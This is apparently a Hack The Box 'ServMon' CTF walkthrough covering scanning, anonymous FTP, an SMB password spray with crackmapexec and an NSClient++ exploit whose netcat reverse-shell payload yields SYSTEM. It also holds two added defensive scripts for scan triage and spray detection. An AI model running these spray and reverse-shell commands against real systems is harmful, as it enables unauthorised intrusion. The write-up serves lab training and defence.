NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 12:11 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:11
Completed NSE at 12:11, 0.00s elapsed
Initiating NSE at 12:11
Completed NSE at 12:11, 0.00s elapsed
Initiating NSE at 12:11
Completed NSE at 12:11, 0.00s elapsed
Initiating Ping Scan at 12:11
Scanning 10.10.10.184 [4 ports]
Completed Ping Scan at 12:11, 0.64s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:11
Completed Parallel DNS resolution of 1 host. at 12:11, 0.55s elapsed
Initiating SYN Stealth Scan at 12:11
Scanning 10.10.10.184 [1000 ports]
Discovered open port 139/tcp on 10.10.10.184
Discovered open port 22/tcp on 10.10.10.184
Discovered open port 80/tcp on 10.10.10.184
Discovered open port 21/tcp on 10.10.10.184
Discovered open port 445/tcp on 10.10.10.184
Discovered open port 135/tcp on 10.10.10.184
Completed SYN Stealth Scan at 12:11, 3.82s elapsed (1000 total ports)
Initiating Service scan at 12:11
Scanning 6 services on 10.10.10.184
Completed Service scan at 12:13, 129.20s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.184
Retrying OS detection (try #2) against 10.10.10.184
Initiating Traceroute at 12:13
Completed Traceroute at 12:13, 0.53s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 12:13
Completed Parallel DNS resolution of 2 hosts. at 12:13, 0.40s elapsed
NSE: Script scanning 10.10.10.184.
Initiating NSE at 12:13
NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
Completed NSE at 12:13, 22.17s elapsed
Initiating NSE at 12:13
Completed NSE at 12:13, 1.45s elapsed
Initiating NSE at 12:13
Completed NSE at 12:13, 0.00s elapsed
Nmap scan report for 10.10.10.184
Host is up (0.86s latency).
Not shown: 651 filtered ports, 343 closed ports
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp  open  ssh          OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp  open  http
| fingerprint-strings:
|   GetRequest, HTTPOptions, RTSPRequest:
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo:
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL:
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-favicon: Unknown favicon MD5: 3AEF8B29C4866F96A539730FAB53A88F
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.80%I=7%D=6/21%Time=5EEF010B%P=x86_64-pc-linux-gnu%r(NULL
SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.
SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\
SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2
SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")
SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm
SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\
SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh
SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1
SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x
SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20
SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT
SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n
SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\
SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-
SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x
SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2
SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\
SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
Aggressive OS guesses: Microsoft Windows Longhorn (94%), Microsoft Windows 10 1703 (93%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7 SP1 (93%), Microsoft Windows 8.1 Update 1 (93%), Microsoft Windows 10 1511 (92%), Microsoft Windows 7 Enterprise SP1 (92%), Microsoft Windows 8 (92%), Microsoft Windows Vista SP1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4m55s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-06-21T06:48:29
|_  start_date: N/A

TRACEROUTE (using port 995/tcp)
HOP RTT       ADDRESS
1   521.41 ms 10.10.14.1
2   521.53 ms 10.10.10.184

NSE: Script Post-scanning.
Initiating NSE at 12:13
Completed NSE at 12:13, 0.00s elapsed
Initiating NSE at 12:13
Completed NSE at 12:13, 0.00s elapsed
Initiating NSE at 12:13
Completed NSE at 12:13, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.22 seconds
           Raw packets sent: 1836 (84.788KB) | Rcvd: 453 (21.422KB)
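The two findings in that report that matter most from the defender's side are the anonymous FTP login and the SMB signing that is enabled but not required. As an added example (not part of the original walkthrough), the script below parses Nmap's normal-output format for port lines and the two script results, and maps each to a remediation note. The embedded report is a trimmed copy of the scan output above, kept inline so the script runs offline; the remediation wording is mine, not Nmap's.

```python
"""Triage an Nmap normal-output report for the weak settings the scan above
surfaced. Added example, not from the original walkthrough."""
import json
import re

# Trimmed copy of the scan output above, embedded so the example runs offline.
SAMPLE_REPORT = """\
Nmap scan report for 10.10.10.184
Host is up (0.86s latency).
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
22/tcp  open  ssh          OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp  open  http
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

# "<port>/<proto>  <state>  <service>  [<version ...>]"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_ports(report):
    """Return one dict per port line: port, proto, state, service, version."""
    ports = []
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": (m.group(5) or "").strip(),
            })
    return ports


def findings(report):
    """Map each weak setting the report evidences to a remediation note.
    Only checks the scan above gives evidence for are implemented."""
    out = {}
    if "Anonymous FTP login allowed" in report:
        out["ftp-anon"] = ("Disable anonymous authentication on the FTP site, "
                           "or confine it to a read-only directory with no user data.")
    if "Message signing enabled but not required" in report:
        out["smb-signing"] = ("Require SMB signing (LanmanServer RequireSecuritySignature=1) "
                              "so sessions cannot be relayed.")
    open_ports = [p for p in parse_ports(report) if p["state"] == "open"]
    if any(p["port"] == 445 for p in open_ports):
        out["smb-exposed"] = ("445/tcp is reachable from the scanner; filter it at the "
                              "host firewall unless file sharing to this network is intended.")
    return out


def triage(report):
    """Summary a reviewer would attach to the scan: open ports plus findings."""
    return {
        "open_ports": [p["port"] for p in parse_ports(report) if p["state"] == "open"],
        "findings": findings(report),
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_REPORT), indent=2))
```

Feed it a full `nmap -oN` file instead of the embedded sample and the same three checks apply; lines that are not port lines or the two known script outputs are ignored, so the favicon and fingerprint noise in the report above does not affect the result.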
FTP LOGINS AND ENUMERATION
Since nmap identified that anonymous FTP was permitted, I'll grab all of the files there with wget -r ftp://anonymous:@10.10.10.184 (this would not be a great idea on a real server, where there would be tons of stuff, but it works well for a CTF like HTB). There were two files:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> cd Users
250 CWD command successful.
ftp> cd Nadine
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:08PM                  174 Confidential.txt
226 Transfer complete.
ftp> cd ../Nathan
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection.
01-18-20  12:10PM                  186 Notes to do.txt
226 Transfer complete.
ftp>
SMB ENUMERATION
┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #smbclient -L 10.10.10.184
Enter WORKGROUP\root's password:
session setup failed: NT_STATUS_ACCESS_DENIED
┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #
WEBSITE ENUMERATION
CRACKING PASSWORDS
┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ # crackmapexec smb 10.10.10.184 -u nathan -p pass.txt
SMB         10.10.10.184    445    SERVMON          [*] Windows 10.0 Build 18362 x64 (name:SERVMON) (domain:SERVMON) (signing:False) (SMBv1:False)
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:L1k3B1gBut7s@W0rk STATUS_LOGON_FAILURE
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:0nly7h3y0unGWi11F0l10w STATUS_LOGON_FAILURE
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:IfH3s4b0Utg0t0H1sH0me STATUS_LOGON_FAILURE
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:Gr4etN3w5w17hMySk1Pa5$ STATUS_LOGON_FAILURE
┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ # crackmapexec smb 10.10.10.184 -u nadine -p pass.txt
SMB         10.10.10.184    445    SERVMON          [*] Windows 10.0 Build 18362 x64 (name:SERVMON) (domain:SERVMON) (signing:False) (SMBv1:False)
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nadine:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nadine:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE
SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nadine:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE
SMB         10.10.10.184    445    SERVMON          [+] SERVMON\nadine:L1k3B1gBut7s@W0rk
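Seen from the target, the two crackmapexec runs above are a short burst of failed SMB logons for nathan, then for nadine, then one success, all from the same source address. As an added example (not part of the walkthrough), the detector below looks for exactly that shape in logon records: many failures from one source across several accounts inside a time window, followed by a success. The records are constructed and simplified (ISO timestamp, Windows event ID 4625 for a failed logon or 4624 for a successful one, account, source address); the source addresses are placeholders, not the ones in the walkthrough.

```python
"""Flag password-spray bursts in simplified Windows logon records.
Added example, not from the walkthrough; all sample data is constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records: "<iso time> <event id> <account> <source ip>".
# 4625 = failed logon, 4624 = successful logon. Placeholder addresses.
SAMPLE_EVENTS = """\
2020-06-21T06:47:10 4625 nathan 10.0.0.99
2020-06-21T06:47:11 4625 nathan 10.0.0.99
2020-06-21T06:47:12 4625 nathan 10.0.0.99
2020-06-21T06:47:13 4625 nathan 10.0.0.99
2020-06-21T06:47:14 4625 nathan 10.0.0.99
2020-06-21T06:47:15 4625 nathan 10.0.0.99
2020-06-21T06:47:16 4625 nathan 10.0.0.99
2020-06-21T06:47:20 4625 nadine 10.0.0.99
2020-06-21T06:47:21 4625 nadine 10.0.0.99
2020-06-21T06:47:22 4625 nadine 10.0.0.99
2020-06-21T06:47:23 4624 nadine 10.0.0.99
2020-06-21T06:50:00 4625 alice 10.0.0.7
2020-06-21T06:50:30 4624 alice 10.0.0.7
"""


def parse_events(text):
    """Return (timestamp, event_id, account, source) tuples, one per line."""
    events = []
    for line in text.splitlines():
        ts, eid, account, src = line.split()
        events.append((datetime.fromisoformat(ts), int(eid), account, src))
    return events


def detect_spray(events, window=timedelta(minutes=5), min_failures=5, min_accounts=2):
    """Return {source: summary} for each source that produced at least
    min_failures failed logons across at least min_accounts accounts within
    `window`. The summary records whether a successful logon from that
    source followed the burst (the account that was compromised)."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev[3]].append(ev)

    alerts = {}
    for src, evs in by_src.items():
        evs.sort()
        fails = [e for e in evs if e[1] == 4625]
        # Slide a window over the failures, anchored at each failure in turn.
        for i, anchor in enumerate(fails):
            burst = [f for f in fails[i:] if f[0] - anchor[0] <= window]
            accounts = {f[2] for f in burst}
            if len(burst) >= min_failures and len(accounts) >= min_accounts:
                last_fail = burst[-1][0]
                success = next((e for e in evs if e[1] == 4624 and e[0] >= last_fail), None)
                alerts[src] = {
                    "failures": len(burst),
                    "accounts": sorted(accounts),
                    "compromised": success[2] if success else None,
                }
                break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for src, info in detect_spray(parse_events(SAMPLE_EVENTS)).items():
        print(src, info)
```

The single failure from 10.0.0.7 followed by a success is the ordinary mistyped-password case and is not reported; the burst from 10.0.0.99 is, with nadine named as the account whose logon succeeded after it. Lowering `min_accounts` to 1 turns the same function into a plain brute-force detector for one account.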
SSH LOGIN USER ACCESS
┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #ssh nadine@10.10.10.184
nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

nadine@SERVMON C:\Users\Nadine>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine

08/04/2020  23:16    <DIR>          .
08/04/2020  23:16    <DIR>          ..
18/01/2020  11:23    <DIR>          3D Objects
18/01/2020  11:23    <DIR>          Contacts
08/04/2020  22:28    <DIR>          Desktop
08/04/2020  22:28    <DIR>          Documents
18/01/2020  11:23    <DIR>          Downloads
08/04/2020  22:27    <DIR>          Favorites
08/04/2020  22:27    <DIR>          Links
18/01/2020  11:23    <DIR>          Music
18/01/2020  11:31    <DIR>          OneDrive
18/01/2020  11:23    <DIR>          Pictures
18/01/2020  11:23    <DIR>          Saved Games
18/01/2020  11:23    <DIR>          Searches
18/01/2020  11:23    <DIR>          Videos
               0 File(s)              0 bytes
              15 Dir(s)  27,858,857,984 bytes free

nadine@SERVMON C:\Users\Nadine>cd Desktop

nadine@SERVMON C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine\Desktop

08/04/2020  22:28    <DIR>          .
08/04/2020  22:28    <DIR>          ..
21/06/2020  08:06                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,859,218,432 bytes free

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
1ef91a525ec2fab2d6a65fc0a385d66f

nadine@SERVMON C:\Users\Nadine\Desktop>
GETTING ROOT ACCESS
The NSClient++ exploit was not working for me in the browser, so I used this one instead!!
┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #searchsploit nsclient
----------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                       |  Path
----------------------------------------------------------------------------------------------------- ---------------------------------
NSClient++ 0.5.2.35 - Authenticated Remote Code Execution                                            | json/webapps/48360.txt
NSClient++ 0.5.2.35 - Privilege Escalation                                                           | windows/local/46802.txt
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #searchsploit -m json/webapps/48360.txt
  Exploit: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution
      URL: https://www.exploit-db.com/exploits/48360
     Path: /usr/share/exploitdb/exploits/json/webapps/48360.txt
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /root/Desktop/HTB/servmon/48360.txt

┌─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #
Exploiting it using the script
┌─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #mv 48360.txt exploit.py
┌─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #chmod +x exploit.py
┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #python3 exploit.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c "c:/temp/nc.exe 10.10.14.12 9009 -e cmd.exe"
[!] Targeting base URL https://127.0.0.1:8443
[!] Obtaining Authentication Token . . .
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[!] Enabling External Scripts Module . . .
[!] Configuring Script with Specified Payload . . .
[+] Added External Script (name: nnXjfcSwKTn)
[!] Saving Configuration . . .
[!] Reloading Application . . .
[!] Waiting for Application to reload . . .
[!] Obtaining Authentication Token . . .
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[!] Triggering payload, should execute shortly . . .
[!] Timeout exceeded. Assuming your payload executed . . .
Listening on the given port
┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
└──╼ #nc -lnvp 9009
listening on [any] 9009 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.184] 49940
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE